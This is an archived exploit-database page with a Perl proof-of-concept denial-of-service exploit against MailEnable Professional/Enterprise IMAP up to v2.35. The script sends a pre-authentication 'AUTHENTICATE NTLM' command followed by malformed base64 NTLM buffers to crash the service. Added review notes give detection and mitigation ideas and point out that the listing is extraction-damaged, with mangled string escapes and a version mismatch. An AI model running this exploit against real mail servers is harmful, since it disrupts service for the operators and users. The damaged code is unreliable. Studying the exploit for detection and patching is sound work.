MailEnable Professional/Enterprise <= 2.35 Out of Bounds DoS Exploit
SEBUG-ID:6241
SEBUG-Appdir:MailEnable
Published:2007-02-22
Exploit:
The following procedures (methods) may contain something offensive; they are intended only for security research and teaching. Use at your own risk!
#!/usr/bin/perl
#
# maildisable-v5.pl
#
# Mail Enable Professional/Enterprise <=v2.35 (win32)
# by mu-b - Wed Nov 29 2006
#
# - Tested on: Mail Enable Professional v2.32 (win32) - with HOTFIX
# Mail Enable Professional v2.33 (win32)
# Mail Enable Professional v2.34 (win32)
# Mail Enable Professional v2.35 (win32)
#
# out of bounds read == DoS
#
########
# Main flow of the proof of concept (reading notes for defenders).
#
# NOTE(review): this archived copy is extraction-damaged. Quotes appear
# backslash-escaped and the escape sequences inside string literals were
# altered, so the listing is not valid Perl as shown. The notes below
# describe only the intent that is visible in the text.
#
# What the script does, in order:
#   1. Parses the -t option into $target and calls usage() (which exits)
#      when no target was given.
#   2. Opens a TCP connection to port 143 ($imapd_port) on the target via
#      connect_host().
#   3. Sends "1 AUTHENTICATE NTLM" as the first command on the connection.
#      No login command precedes it, so as far as this script shows the
#      condition is reached before authentication.
#   4. Sends two base64-encoded buffers built from 'A' padding ($PAD) plus
#      a few fixed bytes, in the places where the server would expect the
#      client's NTLM messages, pausing $send_delay seconds between sends.
#   5. Prints a success line. No server reply is ever read and the return
#      values of send() are not checked, so that line only means the
#      script reached its end; it is not evidence that the service failed.
#
# Defender notes:
#   - Affected, per the file header: MailEnable Professional/Enterprise
#     <= v2.35 (win32); the author describes the bug as an out-of-bounds
#     read leading to denial of service. The page names no fixed release;
#     confirm the patched version against the vendor's advisories.
#   - Detection idea: an IMAP session that issues AUTHENTICATE NTLM and
#     then supplies base64 that does not decode to a well-formed NTLM
#     message (here, long runs of 'A'), followed by the IMAP service
#     stopping or restarting.
#   - Exposure reduction until patched: limit who can reach the IMAP port,
#     and turn off NTLM authentication on IMAP if the product allows it
#     and it is not needed.
#
# NOTE(review): the script runs without "use strict" / "use warnings" and
# uses the legacy &name call syntax and a bareword SOCKET handle.
use Getopt::Std; getopts(\'t:\', \\%arg);
use Socket;
use MIME::Base64;
&print_header;
my $target;
if (defined($arg{\'t\'})) { $target = $arg{\'t\'} }
if (!(defined($target))) { &usage; }
my $imapd_port = 143;
my $send_delay = 2;
my $PAD = \'A\';
if (connect_host($target, $imapd_port)) {
print(\"-> * Connected
\");
send(SOCKET, \"1 AUTHENTICATE NTLM
\", 0);
sleep($send_delay);
$buf = ($PAD x 12).
\"xfaxffxffxff\".
($PAD x 12);
send(SOCKET, encode_base64($buf).\"
\", 0);
sleep($send_delay);
$buf = ($PAD x 28).
\"x00x01\".
($PAD x 2).
\"xefxbexadxde\";
send(SOCKET, encode_base64($buf).\"
\", 0);
sleep($send_delay);
print(\"-> * Successfully sent payload!
\");
}
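# Print the tool banner to STDOUT. Takes no arguments.
#
# NOTE(review): the banner says "<=v2.36", while the file header and its
# "Tested on" list stop at v2.35. Treat v2.35 as the highest release the
# author reports testing; the page does not say which figure is intended.
# NOTE(review): nothing follows "by:" in this copy; the file header
# credits mu-b, so the contact text was presumably stripped by the archive.
sub print_header {
    print("MailEnable Pro <=v2.36 DoS POC\n");
    print("by:\n");
}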
# Print the command-line help to STDOUT and terminate with exit status 1.
# Called when the required -t option is absent.
#
# NOTE(review): the first help line ends at "-t" with no argument
# placeholder; presumably an angle-bracketed "<hostname>" was lost when
# the page was archived.
sub usage {
    my $help_text = "Usage: $0 -t\n" . "-t : hostname to test\n";
    print($help_text);
    exit(1);
}
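# Open a TCP connection to the given host and port on the package-level
# SOCKET handle, which the main flow then writes to.
#
# Parameters:
#   $host - host name or dotted-quad address to connect to
#   $port - TCP port number
# Returns: 1338 on success (the caller only tests the value for truth).
# Dies with an "Error: ..." message when any step fails.
sub connect_host {
    # Lexicals keep the helper from leaking $iaddr/$paddr/$proto/$port into
    # package globals.
    my ($host, $port) = @_;

    # inet_aton() does not set $!, so report the resolution failure
    # directly instead of printing a stale errno string.
    my $iaddr = inet_aton($host)
        or die("Error: cannot resolve host '$host'\n");
    my $paddr = sockaddr_in($port, $iaddr);
    my $proto = getprotobyname('tcp')
        or die("Error: getprotobyname failed: $!\n");

    # The bareword SOCKET handle is kept because the main flow sends on it.
    socket(SOCKET, PF_INET, SOCK_STREAM, $proto)
        or die("Error: socket: $!\n");
    connect(SOCKET, $paddr)
        or die("Error: connect: $!\n");

    return(1338);
}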